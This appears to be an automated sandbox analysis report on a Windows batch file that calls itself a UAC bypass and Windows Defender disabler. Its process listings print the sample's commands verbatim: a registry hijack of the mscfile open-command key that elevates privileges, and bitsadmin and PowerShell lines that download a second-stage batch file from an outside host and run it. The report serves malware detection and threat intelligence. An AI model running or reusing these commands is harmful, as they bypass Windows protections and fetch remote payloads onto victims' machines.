Malware Analysis Report

2024-10-16 05:07

Sample ID 240729-zy23msvejh
Target Uac Bypass Windows Defender Disabler.bat
SHA256 acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Tags
dropper execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e

Threat Level: Likely malicious

The file Uac Bypass Windows Defender Disabler.bat was found to be: Likely malicious.

Malicious Activity Summary

dropper execution

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry key

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 21:08

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 21:08

Reported

2024-07-29 21:11

Platform

win11-20240709-en

Max time kernel

148s

Max time network

156s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5232 wrote to memory of 4532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5232 wrote to memory of 4532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4532 wrote to memory of 6012 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4532 wrote to memory of 6012 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5232 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5232 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5232 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5232 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5232 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5232 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5232 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5232 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3904 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3904 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4996 wrote to memory of 3720 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4996 wrote to memory of 3720 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/3484-0-0x00007FFBB88D3000-0x00007FFBB88D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snw0qist.kax.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3484-9-0x0000026FF2020000-0x0000026FF2042000-memory.dmp

memory/3484-10-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp

memory/3484-11-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp

memory/3484-12-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp

memory/3484-16-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 fd4da2cc07c7d383dc94559b5a2b7dea
SHA1 d2acf7fb38e61fd0eb426ce74656facc64ca82b3
SHA256 cc53793f4614d359876cdf2f8e5a76492edd83cafbde8b6658d225e4ae5cde05
SHA512 c46fef3b8ecb810f7c7366f27ae8c3fe72675fc55f3605bc311b24e2df465e5c43d8512c23cfa965f06a41ee235e42de6dba1628539aa0cb67b729de84d4d239

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 21:08

Reported

2024-07-29 21:10

Platform

win10-20240404-en

Max time kernel

79s

Max time network

83s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2896 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2896 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2292 wrote to memory of 500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2292 wrote to memory of 500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2896 wrote to memory of 3268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2896 wrote to memory of 3268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2896 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2896 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2896 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2896 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3968 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3968 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 980 wrote to memory of 1836 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 980 wrote to memory of 1836 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/2536-2-0x00007FFB06773000-0x00007FFB06774000-memory.dmp

memory/2536-5-0x0000026C49140000-0x0000026C49162000-memory.dmp

memory/2536-8-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp

memory/2536-10-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp

memory/2536-9-0x0000026C492F0000-0x0000026C49366000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2t4ng0fr.yay.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2536-25-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp

memory/2536-31-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 fd4da2cc07c7d383dc94559b5a2b7dea
SHA1 d2acf7fb38e61fd0eb426ce74656facc64ca82b3
SHA256 cc53793f4614d359876cdf2f8e5a76492edd83cafbde8b6658d225e4ae5cde05
SHA512 c46fef3b8ecb810f7c7366f27ae8c3fe72675fc55f3605bc311b24e2df465e5c43d8512c23cfa965f06a41ee235e42de6dba1628539aa0cb67b729de84d4d239